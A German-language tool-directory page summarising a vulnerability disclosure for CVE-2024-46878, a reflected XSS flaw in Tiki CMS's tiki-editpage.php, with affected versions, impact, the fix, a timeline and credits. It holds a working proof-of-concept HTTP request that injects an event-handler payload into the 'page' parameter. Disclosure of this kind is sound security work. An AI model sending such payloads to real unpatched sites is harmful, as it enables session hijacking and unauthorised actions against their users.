Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-46878-TikiCMS-XSS — CVE-2024-46878 - Reflektierte Cross-Site-Scripting (XSS)-Schwachstelle in Tiki CMS | Kitploit
Tools/GitHubGitHub/coldfusionx/cve-2024-46878-tikicms-xss
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubcoldfusionx/cve-2024-46878-tikicms-xss

CVE-2024-46878-TikiCMS-XSS

CVE-2024-46878 - Reflektierte Cross-Site-Scripting (XSS)-Schwachstelle in Tiki CMS

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-46878 - Reflektierte Cross-Site-Scripting-Sicherheitslücke (XSS) in Tiki CMS

Tiki CMS - Reflektierte Cross-Site-Scripting-Sicherheitslücke (XSS) im Parameter 'page'

Haftungsausschluss

Nur für Bildungs-, Forschungs- und Verteidigungszwecke gedacht. Die unbefugte Verwendung gegen Systeme ohne Erlaubnis ist illegal.

Zusammenfassung

In der Datei tiki-editpage.php von Tiki Version 26.3 und früher besteht eine reflektierte Cross-Site-Scripting-Sicherheitslücke (XSS) im Parameter 'page'. Diese Schwachstelle ermöglicht es Angreifern, über einen manipulierten Payload beliebigen JavaScript-Code auszuführen, was zu potenziellem Zugriff auf vertrauliche Informationen oder unbefugten Aktionen führen kann.

Betroffene Produkte

  • Produkt: Tiki CMS Groupware
  • Versionen: 26.3 und früher
  • Komponente: tiki-editpage.php

Details zur Sicherheitslücke

Die Schwachstelle wird durch eine unzureichende Eingabebereinigung des Parameters page in tiki-editpage.php verursacht. Die vom Benutzer bereitgestellte Eingabe wird ohne ausreichende Kodierung in der HTTP-Antwort reflektiert, wodurch die Ausführung von injiziertem JavaScript ermöglicht wird.

Auswirkungen

Ermöglicht es einem authentifizierten Angreifer, über eine manipulierte Anfrage beliebiges JavaScript im Browser eines anderen Benutzers auszuführen, was potenziell zu Session-Hijacking oder unbefugten Aktionen führen kann.

Proof of Concept (PoC)

Anfrage

GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

poc

Behebung

Das Problem wurde in Tiki CMS Groupware Version 27.1 behoben. Benutzern wird empfohlen, auf diese oder eine spätere gepatchte Version zu aktualisieren.

Referenz des Anbieters: https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended

Zeitplan

  • Dem Anbieter gemeldet: 5. September 2024
  • Bestätigung durch den Anbieter: 16. September 2024
  • Behoben in Version 27.1: 22. Dezember 2024
  • Öffentliche Offenlegung (über dieses Repository): 23. März 2026

Danksagungen

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

Referenz

  • https://www.cve.org/CVERecord?id=CVE-2024-46878
  • https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended
Tool herunterladen